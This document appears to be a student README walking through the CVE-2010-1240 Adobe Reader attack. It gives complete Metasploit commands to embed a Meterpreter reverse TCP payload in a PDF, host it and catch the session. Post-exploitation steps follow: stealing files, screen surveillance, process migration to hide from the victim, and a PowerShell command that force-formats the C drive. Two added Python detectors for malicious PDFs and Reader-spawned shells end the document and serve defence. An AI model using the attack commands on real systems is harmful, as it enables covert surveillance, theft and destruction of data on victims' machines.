# Embedded Backdoor Connection via PDF Files :smiling_imp:
***brought to you by***     ![](https://shields.io/badge/Bawang-Ranger-green?style=for-the-badge&logo=CodeIgniter&logoColor=orange)


## Introduction
This demonstration video shows how we can control the victim's device by sending an innocent-looking PDF file, which actually carries an embedded payload, to the target. The exploit was made public as CVE-2010-1240.

As soon as the PDF is opened in Adobe Reader, a user who is tricked by us into accepting the security pop-ups gives us a Meterpreter session connected to their device over a reverse TCP connection. From that moment on, all their data and everything they are doing are under our surveillance.

![Hehe~Boi](https://media.giphy.com/media/dPEJxh06y4OTC/giphy.gif)

## List of Software/Tools
- Metasploit
- [Adobe Reader <= 8.1.2](http://www.oldversion.com/windows/acrobat-reader/)

## Environment

[![Kali Linux](https://img.shields.io/badge/Kali%20Linux-%3E=%202021.1-005ab3?style=for-the-badge&logo=kali-linux&logoColor=white)](https://www.kali.org/get-kali/#kali-virtual-machines)
[![Windows 7 or 10](https://img.shields.io/badge/Windows-7%20%7C%2010%20-0078D6?style=for-the-badge&logo=windows&logoColor=white)](https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/)
[![Adobe Reader](https://img.shields.io/badge/Adobe%20Reader-%3C=%208.1.2-red?style=for-the-badge&logo=adobe-acrobat-reader&logoColor=white)](http://www.oldversion.com/windows/acrobat-reader-8-1-2)

- **Attacker Machine**: Kali Linux version 2021.1
- **Target OS**: Windows 10 (x86) or Windows 7 (x86)
- **Target Software**: Adobe Reader 8.1.2

## Detailed Steps
First, we launch msfconsole, which provides the command-line interface for accessing the Metasploit framework.
```
msfconsole
```

Then, search for exploits that match our target Windows platform and Adobe PDF Reader. This displays the whole list of exploits that can be used to hijack the victim's Windows machine through Adobe PDF Reader vulnerabilities.
```
search type:exploit platform:windows adobe pdf
```

In this exploitation, we select the module "adobe_pdf_embedded_exe" with the command below to achieve our goal of hijacking the victim.
```
use exploit/windows/fileformat/adobe_pdf_embedded_exe
```

We can also check the information of the exploit with the `info` command as shown below:
```
info
```

Then, we set the payload to use a reverse TCP connection. We also use Meterpreter, which provides an interactive shell that makes it easy to run all kinds of functions to explore the victim's machine.
```
set payload windows/meterpreter/reverse_tcp
```

Then, we set the listening host and port. For LHOST, we put in the attacker machine's IP address, which in this case is our Kali machine's IP address (10.0.2.4)*.
- **`*p.s.`**
  - *You have to use your own Kali machine's IP*
  - *You can use a different port number*

Meanwhile, for LPORT, it is up to us to set a port number which is not commonly used.
```
# to check Kali machine's IP address
ifconfig

set LHOST 10.0.2.4
set LPORT 5665
```

Then, we set the input file that serves as the base of the PDF with the INFILENAME* option. Next, we set the filename to something that will attract the victim's interest so that they open the malicious PDF file.
- **`*p.s.`**
  - *Make sure the path to your PDF file is correct*
  - *You can use a different filename*
```
set INFILENAME '/home/kali/Documents/WIC3004Assignment.pdf'
set FILENAME 'Bawang_Ranger_WIC3004Report.pdf'
```

We can view our options again before we enter the `exploit` command to generate the PDF with the payload embedded.
```
# Then we can show the info or options by
show info | show options

exploit
```

Once the PDF file has been generated, we move it to /var/www/html, the directory from which our Kali machine's web server serves files, so that the victim can download the PDF file later.
- **`Note:`**
  - *If you have set a different filename, make sure you copy the right path instead!*
```
sudo mv /home/kali/.msf4/local/Bawang_Ranger_WIC3004Report.pdf /var/www/html
```

Then, to set up our listener, we use "exploit/multi/handler". Again, we set the payload, LHOST and LPORT to match what we defined when generating the malicious PDF file. Then we run the handler.
- **`Note:`**
  - *LHOST: use your own Kali machine's IP address*
  - *LPORT: If you have set a different port number, make sure you type in the number correctly*
  - `show info` or `show options` is optional.
  - Running it just verifies what you have set.
```
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.2.4
set LPORT 5665
[show info | show options]
run
```

In another terminal, we check the status of the Apache server to make sure it is running and hosting our PDF file from /var/www/html for the victim to download.
```
service apache2 status

# If it is inactive, start the service
service apache2 start
```
---
On the Windows machine, open any browser, such as Chrome, and type in our Kali's IP (10.0.2.4)* to access the web server of the Kali machine.

**`*Note:`** *Use your own Kali machine's IP address*

Then, acting as the user, save the intended PDF file.

Once the victim opens the file in Adobe Reader 8.1.2 and accepts the security prompts, we can observe on our Kali machine that a new session has connected via the reverse TCP connection.

**In a real-world scenario,** we would set up a website with the embedded-payload PDF for the victim to download, or attach the file to an email.

---

## Result of the exploitation

Now we can remotely access the victim's machine and perform further malicious actions of our choosing in the Meterpreter session.

### To show a list of things that we can do
```
help
```
### Show the current directory
```
pwd
```
### List the files in that directory
```
ls
```
### Download a folder or file from the victim machine
For example, if there is a file named `password.txt`, we can issue the `download password.txt` command.
```
download [folder name | filename with extension]
```
### Create a file on the victim machine
Of course, we can write a malicious script (implanting a backdoor) to keep us connected to the Windows machine if we're really evil! :skull:
```
# Boot command prompt at background
execute -f cmd.exe -H -i

# Create file on Windows
echo "You have been hacked" > hack.txt
```
### Interact with Windows
```
# open the txt file we have just created
hack.txt

# Take screenshot
screenshot

# Watch the remote user in real time
screenshare
```
### Additional
However, the attacker can reduce suspicion by migrating the Meterpreter process to a different one using the migrate module in the Meterpreter session.
```
meterpreter> run post/windows/manage/migrate
```
Here, it automatically spawns a new process on the victim's machine and migrates into it. The victim could then delete the infected PDF file, completely unaware that the process has already moved elsewhere.

The attacker can further create a malicious script on the target machine using the command prompt (cmd) or PowerShell that can render the whole operating system unusable.
```
meterpreter> shell
```
```
# Start the Windows PowerShell
powershell

# PowerShell command to forcefully format the C drive clean.
New-Partition -DiskNumber 1 -UseMaximumSize -AssignDriveLetter C| Format-Volume -DriveLetter C -FileSystemLabel "New"-FileSystem NTFS -Full -Force -Confirm:$false
```

## Demonstration Video

[![Demo](https://i.imgur.com/FG8Ftvg.jpg)](https://youtu.be/TJkEAZb7-so "[Demonstration] Embedded Backdoor Connection via PDF Files | Bawang Ranger")


[//]: # (https://shields.io/badge/Chan-%20Jia%20Liang-green?style=for-the-badge&logo=CodeIgniter&logoColor=orange)
[//]: # (https://img.shields.io/badge/YouTube-FF0000?style=for-the-badge&logo=youtube&logoColor=white)
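Seen from the defender's side, the file that the "Detailed Steps" above produce is a PDF carrying an embedded file stream together with a launch action that asks Adobe Reader to run it; a mail gateway, a download proxy or an analyst can triage a document for exactly that pattern before it ever reaches a vulnerable Reader 8.1.2. The following Python script is an added example and is not part of the original assignment or of Metasploit. The two PDF skeletons inside it are constructed samples (not the generated `Bawang_Ranger_WIC3004Report.pdf`), and the indicator names and the three risk levels are this example's own choices.

```python
"""Static triage of a PDF for the CVE-2010-1240-style pattern: an embedded
file plus a /Launch (or /OpenAction) that tells the reader to execute it.
Added example, not part of the original assignment. Sample PDFs below are
constructed; they contain no executable content."""
import re

# Each indicator is a regex over the raw PDF bytes. Object streams, Flate
# compression and name escaping can hide these keys, so "no hit" only
# means nothing was visible in the plain text of the file.
INDICATORS = {
    "embedded_file": rb"/Type\s*/EmbeddedFile",
    "filespec":      rb"/Type\s*/Filespec",
    "launch_action": rb"/S\s*/Launch",
    "open_action":   rb"/OpenAction",
    "javascript":    rb"/S\s*/JavaScript|/JS\b",
    "exe_in_spec":   rb"\.exe\b",
}


def scan_pdf_bytes(data):
    """Return {indicator_name: match_count} for every indicator present."""
    hits = {}
    for name, pattern in INDICATORS.items():
        count = len(re.findall(pattern, data, flags=re.IGNORECASE))
        if count:
            hits[name] = count
    return hits


def risk_level(hits):
    """Embedded file + launch action is the embedded-EXE pattern itself;
    any one of launch/JavaScript/embedded file alone still deserves a look."""
    if "launch_action" in hits and "embedded_file" in hits:
        return "high"
    if any(k in hits for k in ("launch_action", "javascript", "embedded_file")):
        return "medium"
    return "low"


def scan_pdf_file(path):
    """Triage a PDF on disk; returns (risk_level, hits)."""
    with open(path, "rb") as fh:
        hits = scan_pdf_bytes(fh.read())
    return risk_level(hits), hits


# Constructed sample: minimal PDF object skeleton with an embedded "file"
# (five bytes of text) and an OpenAction that launches it via a Filespec.
SAMPLE_MALICIOUS = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
4 0 obj << /Type /EmbeddedFile /Length 5 >> stream
hello
endstream endobj
5 0 obj << /Type /Action /S /Launch /F 6 0 R >> endobj
6 0 obj << /Type /Filespec /F (report.exe) /EF << /F 4 0 R >> >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Constructed sample: the same skeleton with no actions or attachments.
SAMPLE_BENIGN = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for label, data in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        hits = scan_pdf_bytes(data)
        print(f"{label}: risk={risk_level(hits)} hits={hits}")
```

Run it as `python triage.py` for the built-in samples, or call `scan_pdf_file(path)` on a real document. Because the check is a plain-text regex pass, a `low` result is not a clean bill of health; a document whose objects sit inside compressed object streams would need to be decompressed first. The durable fix remains keeping Reader at a supported version and leaving the launch-action prompt that the walkthrough relies on the victim clicking through at its default.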
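The `execute -f cmd.exe`, `shell` and `powershell` steps in the "Result of the exploitation" section, together with the reverse TCP connection back to LPORT 5665, leave a process tree rooted at Adobe Reader and an outbound connection from that tree, which is what an endpoint sensor sees. The following Python detector is an added example and is not part of the original assignment: it tracks every process descended from Reader and flags interpreters, children running from outside the Windows and Program Files directories, and outbound connections to ports other than 80/443. The log lines are constructed to resemble Sysmon process-creation (EventID 1) and network-connection (EventID 3) records; the `key=value` line format, field names, paths and process IDs are assumptions, not captured telemetry.

```python
"""Process-lineage detection for Reader-spawned shells and reverse TCP
callbacks. Added example, not part of the original assignment. The log
format and every value in SAMPLE_LOG are constructed for illustration."""
import re

READER_IMAGES = {"acrord32.exe", "acrobat.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
EXPECTED_PORTS = {80, 443}  # ports a document reader plausibly talks to

# Constructed line format: key=value pairs, values with spaces in double quotes.
KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line):
    """Parse one constructed 'key=value key="quoted value"' log line."""
    return {key: (quoted or bare) for key, quoted, bare in KV.findall(line)}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


class ReaderLineageDetector:
    """Remember Reader and all of its descendants by PID and evaluate each
    new process or connection in that subtree."""

    def __init__(self):
        self.lineage = {}  # pid -> image path for Reader and its descendants

    def feed(self, ev):
        """Return an alert string for a suspicious event, else None."""
        if ev.get("EventID") == "1":
            return self._on_process(ev)
        if ev.get("EventID") == "3":
            return self._on_connect(ev)
        return None

    def _on_process(self, ev):
        pid, ppid = ev.get("ProcessId"), ev.get("ParentProcessId")
        image = ev.get("Image", "")
        if basename(image) in READER_IMAGES:
            self.lineage[pid] = image  # new root of a Reader subtree
            return None
        if ppid not in self.lineage:
            return None  # unrelated process
        self.lineage[pid] = image  # descendant of Reader
        name = basename(image)
        if name in INTERPRETERS:
            return (f"reader-lineage-interpreter: pid {pid} {name} "
                    f"(parent {basename(self.lineage[ppid])})")
        if not image.lower().startswith(TRUSTED_DIRS):
            return f"reader-lineage-untrusted-path: pid {pid} {image}"
        return None

    def _on_connect(self, ev):
        pid = ev.get("ProcessId")
        if pid not in self.lineage or ev.get("Initiated") != "true":
            return None
        port = int(ev.get("DestinationPort", "0"))
        if port in EXPECTED_PORTS:
            return None
        return (f"reader-lineage-outbound: pid {pid} {basename(self.lineage[pid])} "
                f"-> {ev.get('DestinationIp')}:{port}")


def run_detection(lines):
    """Feed log lines in order; return the list of alerts raised."""
    detector = ReaderLineageDetector()
    alerts = []
    for line in lines:
        if line.strip():
            alert = detector.feed(parse_event(line))
            if alert:
                alerts.append(alert)
    return alerts


# Constructed sample log mirroring the walkthrough's chain: Reader starts,
# a shell appears under it, a dropped executable runs from Temp, and that
# executable calls back to the handler on port 5665.
SAMPLE_LOG = [
    r'EventID=1 ProcessId=1200 ParentProcessId=900 Image="C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe"',
    r'EventID=1 ProcessId=1300 ParentProcessId=1200 Image="C:\Windows\System32\cmd.exe" CommandLine="cmd.exe"',
    r'EventID=1 ProcessId=1400 ParentProcessId=1300 Image="C:\Users\victim\AppData\Local\Temp\report.exe"',
    r'EventID=3 ProcessId=1400 Initiated=true DestinationIp=10.0.2.4 DestinationPort=5665',
    r'EventID=3 ProcessId=1200 Initiated=true DestinationIp=203.0.113.10 DestinationPort=443',
    r'EventID=1 ProcessId=1500 ParentProcessId=900 Image="C:\Windows\System32\notepad.exe"',
]

if __name__ == "__main__":
    for alert in run_detection(SAMPLE_LOG):
        print(alert)
```

The lineage table is what makes the later `migrate` step visible too: once Meterpreter moves into another process, the original child exits while the network connection reappears under a PID the detector never saw under Reader, so a production rule would additionally key on the remote address and port already reported for the subtree.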